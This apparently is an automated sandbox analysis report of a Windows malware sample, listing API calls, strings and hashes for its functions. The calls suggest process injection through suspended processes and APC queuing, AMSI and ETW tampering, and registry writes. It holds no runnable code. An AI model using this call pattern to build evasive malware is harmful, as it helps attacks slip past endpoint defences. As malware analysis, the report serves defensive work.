                                                              • Instruction ID: b39a8014757d4a89ff599e240ba940b06504358eab89bdd22ad5856ccb602f0e
                                                              • Opcode Fuzzy Hash: 844ce991050213c7e4c6c7711024c96a84a136f00df133a29fed2a8a42122533
                                                              • Instruction Fuzzy Hash: E201F271608B04AFEB05EF65DC5296BBBBDEB49B10B5244B6F905D2650E6308E10C960

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 02B98824: LoadLibraryA.KERNEL32(00000000,00000000,02B9890B), ref: 02B98858
                                                                • Part of subcall function 02B98824: FreeLibrary.KERNEL32(74FC0000,00000000,02BE1388,Function_000065D8,00000004,02BE1398,02BE1388,05F5E0FF,00000040,02BE139C,74FC0000,00000000,00000000,00000000,00000000,02B9890B), ref: 02B988EB
                                                              • CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02CD57DC,02CD5820,OpenSession,02BE137C,02BAAFD8,UacScan,02BE137C), ref: 02BA7E39
                                                              • ResumeThread.KERNEL32(000008E8,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,UacScan,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8), ref: 02BA8483
                                                                • Part of subcall function 02B98584: NtQueueApcThread.NTDLL(?,?,?,?,?), ref: 02B985B5
                                                              • CloseHandle.KERNEL32(000008EC,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,UacScan,02BE137C,02BAAFD8,000008E8,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C), ref: 02BA8602
                                                                • Part of subcall function 02B987A0: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize,02BE13A4,02B9A77C,UacScan), ref: 02B987B4
                                                                • Part of subcall function 02B987A0: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B987CE
                                                                • Part of subcall function 02B987A0: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize), ref: 02B9880A
                                                              • CloseHandle.KERNEL32(000008EC,000008EC,ScanBuffer,02BE137C,02BAAFD8,UacInitialize,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,UacScan,02BE137C), ref: 02BA89F4
                                                                • Part of subcall function 02B87E18: GetFileAttributesA.KERNEL32(00000000,?,02B9F8CC,ScanString,02BE137C,02BAAFD8,OpenSession,02BE137C,02BAAFD8,ScanString,02BE137C,02BAAFD8,UacScan,02BE137C,02BAAFD8,UacInitialize), ref: 02B87E23
                                                                • Part of subcall function 02B9DACC: RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DB9E), ref: 02B9DB0B
                                                                • Part of subcall function 02B9DACC: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B9DB45
                                                                • Part of subcall function 02B9DACC: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B9DB72
                                                                • Part of subcall function 02B9DACC: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B9DB7B
                                                                • Part of subcall function 02B9818C: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B98216), ref: 02B981F8
                                                              • ExitProcess.KERNEL32(00000000,OpenSession,02BE137C,02BAAFD8,ScanBuffer,02BE137C,02BAAFD8,Initialize,02BE137C,02BAAFD8,00000000,00000000,00000000,ScanString,02BE137C,02BAAFD8), ref: 02BAAA25
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Library$CloseFile$CreateFreeHandleLoadProcessThread$AddressAttributesCacheExitFlushInstructionProcQueueResumeUserWrite
                                                              • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZER$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                              • API String ID: 849842579-3388343709
                                                              • Opcode ID: 4632b42a45f0cb6f2eeb4bb6bac411d5779f48b34377b58ccc89fd491064de14
                                                              • Instruction ID: 40e61c8e3f13d544ee01e5146313e4c51a7ecdfbb0004269834b945e13ab9d3a
                                                              • Opcode Fuzzy Hash: 4632b42a45f0cb6f2eeb4bb6bac411d5779f48b34377b58ccc89fd491064de14
                                                              • Instruction Fuzzy Hash: A7431875A1415A8FDB25FB64CD909DEB3B6EF89344F1044E6E00DEB214DA31AE86CF60

                                                              Control-flow Graph

                                                              APIs
                                                              • Sleep.KERNEL32(00000000,?,02B82000), ref: 02B817D0
                                                              • Sleep.KERNEL32(0000000A,00000000,?,02B82000), ref: 02B817E6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: dcbeaecd44160ed00bb6c443458a14230e2c632fdb58d54930102f9940a38e05
                                                              • Instruction ID: 4659c0edcf4ed7d2172b18ebae85d2bc287b7919121400b5240255bb426656ce
                                                              • Opcode Fuzzy Hash: dcbeaecd44160ed00bb6c443458a14230e2c632fdb58d54930102f9940a38e05
                                                              • Instruction Fuzzy Hash: 41B10E76A123418BDB15EF2CD890395BBE1EB85390F0886AED55DCF285E770E452CB90

                                                              Control-flow Graph

                                                              APIs
                                                              • LoadLibraryW.KERNEL32(amsi), ref: 02B98715
                                                                • Part of subcall function 02B980C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(?,?), ref: 02B9812D
                                                                • Part of subcall function 02B97D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B97D74
                                                              • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02B98774
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                              • String ID: DllGetClassObject$W$amsi
                                                              • API String ID: 941070894-2671292670
                                                              • Opcode ID: c566c85ba6d9c4aa4ad4b05de9c60ff6652dadfc482011fc61fbe8fdcf7fecca
                                                              • Instruction ID: 7300798bce4279369654a749e424877ccd92494a5b572c662c1d0fcac9e8f51e
                                                              • Opcode Fuzzy Hash: c566c85ba6d9c4aa4ad4b05de9c60ff6652dadfc482011fc61fbe8fdcf7fecca
                                                              • Instruction Fuzzy Hash: D4F0A4B010C38179E601E7748C45F4FBFCD4B52224F048AACF1E8562D2D679D10497A7

                                                              Control-flow Graph

                                                              APIs
                                                              • Sleep.KERNEL32(00000000,?,?,00000000,02B81FE4), ref: 02B81B17
                                                              • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02B81FE4), ref: 02B81B31
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: ce04d7b0d056510b68052f454514901f0fc02d285d965b88d6881baf796bc048
                                                              • Instruction ID: 26725217c729d7ff251816e8f5c08fcca02ecd81aa265773516848e1e053c8bb
                                                              • Opcode Fuzzy Hash: ce04d7b0d056510b68052f454514901f0fc02d285d965b88d6881baf796bc048
                                                              • Instruction Fuzzy Hash: 6151EE716222408FE715EF6CC9847A6BBD0EF45314F1885EEE54CCB282E770C846CBA1

                                                              Control-flow Graph

                                                              APIs
                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B9E436
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CheckConnectionInternet
                                                              • String ID: Initialize$OpenSession$ScanBuffer
                                                              • API String ID: 3847983778-3852638603
                                                              • Opcode ID: 9d0e6a32140e7a8b249387eb05bde5039b3782148aa7d315843d3ff7631bacb5
                                                              • Instruction ID: 739d1446f386749088442c03efebcaf91c96b8ad69653babc91da527cde85ad6
                                                              • Opcode Fuzzy Hash: 9d0e6a32140e7a8b249387eb05bde5039b3782148aa7d315843d3ff7631bacb5
                                                              • Instruction Fuzzy Hash: 0A410835A50109AFEB10FBA4C880A9EB3FAEF89710F2148B6E145A7250DA75ED05CF61
                                                              APIs
                                                                • Part of subcall function 02B98020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B98090,?,?,00000000,?,02B97A06,ntdll,00000000,00000000,02B97A4B,?,?,00000000), ref: 02B9805E
                                                                • Part of subcall function 02B98020: GetModuleHandleA.KERNELBASE(?), ref: 02B98072
                                                                • Part of subcall function 02B980C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(?,?), ref: 02B9812D
                                                              • WinExec.KERNEL32(?,?), ref: 02B98478
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: HandleModule$AddressProc$Exec
                                                              • String ID: Kernel32$WinExec
                                                              • API String ID: 2292790416-3609268280
                                                              • Opcode ID: dc63219bb448623362a07fa887962068cc2ba0b03757af0a98137b92b60f88f4
                                                              • Instruction ID: c8433b8e344168da69169b0acd526b35c8d239ed4f5b18cda15c1737f9cb83d4
                                                              • Opcode Fuzzy Hash: dc63219bb448623362a07fa887962068cc2ba0b03757af0a98137b92b60f88f4
                                                              • Instruction Fuzzy Hash: 63018C35650204BFEF10EFA8DC41B5E77EDEB4AB40FA184B1F508EBA50D674AD10CA24
                                                              APIs
                                                                • Part of subcall function 02B98020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B98090,?,?,00000000,?,02B97A06,ntdll,00000000,00000000,02B97A4B,?,?,00000000), ref: 02B9805E
                                                                • Part of subcall function 02B98020: GetModuleHandleA.KERNELBASE(?), ref: 02B98072
                                                                • Part of subcall function 02B980C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(?,?), ref: 02B9812D
                                                              • WinExec.KERNEL32(?,?), ref: 02B98478
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: HandleModule$AddressProc$Exec
                                                              • String ID: Kernel32$WinExec
                                                              • API String ID: 2292790416-3609268280
                                                              • Opcode ID: b7a1d9cc486bbc008fe8c67096602234df47546d62e85bb4aa8ffc4865a5f02d
                                                              • Instruction ID: 2c7f397d2829a548fd2e499b5b30cb4cbd891d7a08e97a889313c8f9122c5a7b
                                                              • Opcode Fuzzy Hash: b7a1d9cc486bbc008fe8c67096602234df47546d62e85bb4aa8ffc4865a5f02d
                                                              • Instruction Fuzzy Hash: EDF08C35650204BFEF10EFA8DC41B5E77EDEB4AB40FA184B1F508EBA50D674AD10CA24
                                                              APIs
                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B95CFC,?,?,02B93888,00000001), ref: 02B95C10
                                                              • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B95CFC,?,?,02B93888,00000001), ref: 02B95C3E
                                                                • Part of subcall function 02B87D18: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02B93888,02B95C7E,00000000,02B95CFC,?,?,02B93888), ref: 02B87D66
                                                                • Part of subcall function 02B87F20: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02B93888,02B95C99,00000000,02B95CFC,?,?,02B93888,00000001), ref: 02B87F3F
                                                              • GetLastError.KERNEL32(00000000,02B95CFC,?,?,02B93888,00000001), ref: 02B95CA3
                                                                • Part of subcall function 02B8A700: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02B8C361,00000000,02B8C3BB), ref: 02B8A71F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                               • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                               • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                              • String ID:
                                                              • API String ID: 503785936-0
                                                              • Opcode ID: 24f81dd262b355e21807b5d0a1eb9cd222e08e1ccab95ba5b5147219d15f936a
                                                              • Instruction ID: 9fb7b2a183fcc379a069052d6632742e3862c5291a090e988421c2a261e26e0f
                                                              • Opcode Fuzzy Hash: 24f81dd262b355e21807b5d0a1eb9cd222e08e1ccab95ba5b5147219d15f936a
                                                              • Instruction Fuzzy Hash: B5317274A402099FDF11EFA8C881BDEBBF6AF48714F9084A5E908E7380D7755905CFA1
                                                              APIs
                                                              • RegOpenKeyA.ADVAPI32(?,00000000,02CD5914), ref: 02B9E704
                                                              • RegSetValueExA.ADVAPI32(000008E8,00000000,00000000,00000001,00000000,0000001C,00000000,02B9E76F), ref: 02B9E73C
                                                              • RegCloseKey.ADVAPI32(000008E8,000008E8,00000000,00000000,00000001,00000000,0000001C,00000000,02B9E76F), ref: 02B9E747
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseOpenValue
                                                              • String ID:
                                                              • API String ID: 779948276-0
                                                              • Opcode ID: d9edcb7f6cfbf29bbf1e568fc53661ee71286bf2025575d9773b29ff3dc5fdd3
                                                              • Instruction ID: 6af58e9aacecf65a78b28b86c39bf8c17226a8a353901134eb57350ef633db64
                                                              • Opcode Fuzzy Hash: d9edcb7f6cfbf29bbf1e568fc53661ee71286bf2025575d9773b29ff3dc5fdd3
                                                              • Instruction Fuzzy Hash: D6113D71610209AFEB10FFA8C881EAA77FDEB48750F8045B1F608D7250DB34DE01CA61
                                                              APIs
                                                              • RegOpenKeyA.ADVAPI32(?,00000000,02CD5914), ref: 02B9E704
                                                              • RegSetValueExA.ADVAPI32(000008E8,00000000,00000000,00000001,00000000,0000001C,00000000,02B9E76F), ref: 02B9E73C
                                                              • RegCloseKey.ADVAPI32(000008E8,000008E8,00000000,00000000,00000001,00000000,0000001C,00000000,02B9E76F), ref: 02B9E747
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CloseOpenValue
                                                              • String ID:
                                                              • API String ID: 779948276-0
                                                              • Opcode ID: 6985b353c802adaf7f2504652748b1c9417abfe63e6e1ce745d9ab3d58dbe7bd
                                                              • Instruction ID: 7fc49a04c2f4d6a8e1589030a0e7e00c3bed222dbed0d40b3191edefecfeb52a
                                                              • Opcode Fuzzy Hash: 6985b353c802adaf7f2504652748b1c9417abfe63e6e1ce745d9ab3d58dbe7bd
                                                              • Instruction Fuzzy Hash: C0114F71610209AFEB10FFA8C881E9E77FDEB48750F8045B1F608D7250DB34DA01CA61
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID:
                                                              • API String ID: 1473721057-0
                                                              • Opcode ID: 14beb617443578ad59f747a29bb65dfdb10a2dd5eae48a511f3b8e1777693c0c
                                                              • Instruction ID: 1859afdcfd286aa93c3a75f9b7c87125ffbd20b7450086943ffe964d69a4c1ee
                                                              • Opcode Fuzzy Hash: 14beb617443578ad59f747a29bb65dfdb10a2dd5eae48a511f3b8e1777693c0c
                                                              • Instruction Fuzzy Hash: 45F0F660704200C7CB26BB38DCC4A6D279AAF81710B50D4F6F48E9B255CB34DC45DB62
                                                              APIs
                                                              • SysFreeString.OLEAUT32(02B9E950), ref: 02B84C1A
                                                              • SysAllocStringLen.OLEAUT32(?,?), ref: 02B84D07
                                                              • SysFreeString.OLEAUT32(00000000), ref: 02B84D19
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmp
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmp
